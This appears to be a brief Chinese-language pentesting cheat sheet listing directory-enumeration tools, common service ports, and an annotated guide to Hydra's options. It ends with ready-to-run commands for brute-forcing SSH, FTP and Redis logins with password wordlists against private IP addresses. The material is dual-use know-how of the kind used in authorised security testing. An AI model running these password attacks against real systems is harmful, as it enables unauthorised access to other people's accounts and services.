1. 文件和目录穷举

  a. Pker多线程后台扫描工具 v2.01

  b. 御剑

  c. dirbuster

 

2. 常见的端口服务

  http 80
  https 443
  ftp 21
  ssh 22
  mysql 3306
  mssql 1433
  rsync 873
  oracle 1521
  mongo 28017
  redis 6379
  smtp 25
  POP3 110
  dns 53
  telent 23
  vnc 5900
  pcanywhere 5632
  Apache/Tomcat/Nginx/Axis2/resin/jboss 80|8080
  WebLogic 7001
  Jenkins 8080 8089
  SNMP 161
  Zabbix 8069
  elasticsearch 9200 9300
  rdp 3389

 

3. 穷举爆破神器hydra

  hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]

  [-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

  -R 继续从上一次进度接着破解。

  -S 采用SSL链接。

  -s PORT 可通过这个参数指定非默认端口。

  -l LOGIN 指定破解的用户,对特定用户破解。

  -L FILE 指定用户名字典。

  -p PASS 小写,指定密码破解,少用,一般是采用密码字典。

  -P FILE 大写,指定密码字典。

  -e ns 可选选项,n:空密码试探,s:把用户名当作密码。

  -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

  -M FILE 导入多个ip文件。

  -o FILE 指定结果输出文件。

  -f 找到第一对登录名或者密码的时候中止破解。

  -t TASKS 同时运行的线程数,默认为16。

  -w TIME 设置最大超时的时间,单位秒,默认是30s。

  -v / -V 显示详细过程。

  service 指定服务名,支持的服务和协议:telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt

  http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc

  ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec

  rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere

  teamspeak sip vmauthd firebird ncp afp等等。

   

  爆破ssh服务:

  hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V

  爆破ftp服务:

  hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V

  爆破redis服务:

  hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis